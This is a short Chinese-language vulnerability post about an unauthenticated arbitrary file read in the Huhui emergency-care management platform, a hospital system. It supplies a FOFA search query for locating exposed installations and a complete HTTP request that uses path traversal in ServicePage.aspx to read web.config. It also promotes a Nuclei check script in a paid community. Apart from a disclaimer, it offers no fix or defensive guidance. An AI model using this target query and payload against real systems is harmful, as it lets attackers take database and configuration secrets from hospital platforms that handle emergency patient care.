互慧-急诊综合管理平台 ServicePage.aspx 任意文件读取漏洞

0x01 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！

互慧急诊急救快速联动平台，是用于管理门诊急诊病人的系统，主要包括门诊急诊业务和急诊物资管理两部分，其中门诊急诊业务主要包括院前急救、院内抢救、留观监护、绿色通道、预检分诊等；急诊物资管理包括急诊药品管理、急诊设备管理、抢救车管理、急救箱管理、急诊物资使用操作等与患者抢救相关的物资物品，目的在于通过门急诊管理系统缩短抢救患者流程，规范抢救措施，确保急诊物资使用安全，从而最终达到提高抢救成功率，确保患者的生命安全。

互慧-急诊综合管理平台 ServicePage.aspx 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

FOFA:

body="/emis_lib/js/ThreeExtras.js"

GET/dcwriter/thirdpart/ServicePage.aspx?wasmres=./../web.config HTTP/1.1Host: User-Agent: Mozilla/5.0 (WindowsNT10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: keep-alive

Nuclei验证脚本已发布知识星球：冷漠安全